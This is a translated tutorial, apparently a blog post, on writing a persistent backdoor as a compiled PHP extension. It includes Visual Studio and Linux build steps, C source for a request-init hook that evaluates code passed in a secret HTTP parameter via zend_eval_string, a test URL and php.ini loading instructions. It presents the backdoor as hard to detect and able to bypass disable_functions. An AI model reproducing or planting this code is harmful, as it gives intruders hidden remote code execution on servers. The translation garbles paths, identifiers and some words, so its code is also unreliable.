Teach you how to write a backdoor tutorial based on the PHP extension library

0x00 Preface

Today we'll discuss writing a backdoor based on the PHP extension library. Typically, most intruders leave a custom code block back door in the script. Of course, these things can easily be found through static or dynamic analysis of the source code.

The benefits of leveraging the PHP extension library are obvious:

1 difficult to find bypass disable_functions option has the ability to control all code access code execution API

But we need to have the ability to edit the PHP configuration file.

0x01 Details

"Translator Note: With the Linux two commands, why Windows cost so much effort"

As an example, I'll use Windows to write. Write extensions for my visual Studio Express version. Also need the latest version of the source code, compiled PHP library (can be collected from the same source). For simplicity's sake, we need to be Php-5.5.15-win32 's vc11-86 and source Php-5.5.15-src.zip

Decompression using C compiler php:php, source code in C:PHP-SRC.

Then, you need to make some settings.

1) Add Preprocessor Definitions:

Zend_debug=0 Zts=1 Zend_win32 Php_win32

Preprocessor definition

2) Added directory for connection source:

C:php-srcmain c:php-srcend c:php-srctsrm c:php-src Egex c:php-src

Other Directory Connections

3 Add other directories to Liboy php5ts.lib (c:php Dev)

Other Catalog Libraries

4 Add Connection Library Php5ts.lib.

Assemble additional libraries

5 Specifies the path of the collection file.

Save configuration file

Configuration parameters are developed after the workspace extension (details can be found in http://blog.slickedit.com/2007/09/creating-a-php-5-extension-with-visual-c-2005/), Create a new project type backdoor "Win32 for console Applications".

In the Visual Studiovyberem type library dll» project

Select the appropriate type

Then, remove unnecessary files from the project. should only need backdoor.cpp,stdafx.cpp and stdafx.h.

In header file stdafx.h

：

#pragma once #ifndef STDAFX #define STDAFX #include "zend_config.w32.h" #include "php.h" #endif

Now we go directly to the PHP extension code. Delete all rows and add the required file connections.

#include "stdafx.h" #include "zend_config.w32.h" #include "php.h"

If the workspace setting is correct, the warning disappears.

When a module is initialized, there are several events, each of which takes place under certain conditions. We need to execute our code while the query is executing. To do this, you have to initialize the functionality we need, and I'll name it «hideme».

Php_rinit_function (Hideme);

Then you can look at the initialization of the module.

Zend_module_entry hideme_ext_module_entry = {standard_module_header, "simple backdoor", NULL, NULL, NULL, Php_rinit ( Hideme), NULL, NULL, "1.0", standard_module_properties}; Zend_get_module (Hideme_ext);

In this article, we only need to load the code to be executed, so the run and unload module is replaced by NULL.

Now, you can look at the Hideme function body.

Php_rinit_function (hideme) {char* method = "_post";//Super Global array, from which we take perametr and value char* secret_string = "secret_string"; Number, this will be the code to run//"translator Note: In the original author's github code method is Get,secret_string is execute, please follow the GitHub code to test, do not modify the original" zval** arr; char* Code; if (Zend_hash_find (&eg (symbol_table), method, strlen (method) + 1, (void**) &arr)!= failure) {hashtable* HT = Z_ar Rval_p (*arr); zval** Val; if (Zend_hash_find (HT, secret_string, strlen (secret_string) + 1, (void**) &val)!= failure) {//Find the required parameters in the hash code = Z_st Rval_pp (Val); Value zend_eval_string (Code, NULL, (char *) "" tsrmls_cc); Code Execution}} return SUCCESS; }

Comments should be more clear. Initially, we set the HTTP method and parameter secret_string. Then we look for the correct array parameter, and if so, we take the instruction from its value and execute the code through zend_eval_string.

The compiled proceeds can be used as an extension library.

Download source code

Https://github.com/akamajoris/php-extension-backdoor

0x02 test

The following is a screenshot of the translator's test:

1http://127.0.0.1:1629/20140917/test.php?execute=phpinfo ();

(because the original author GitHub code is set to execute)

Linux compilation (Kali)

1apt-get Install Php5-dev phpize &&/configure && make

Under the Kali test again success, I am lazy, direct chmod after so copy to/var/www haha

Then PHP.ini Plus

1extension=/var/www/back.so

Reboot Apache, test successful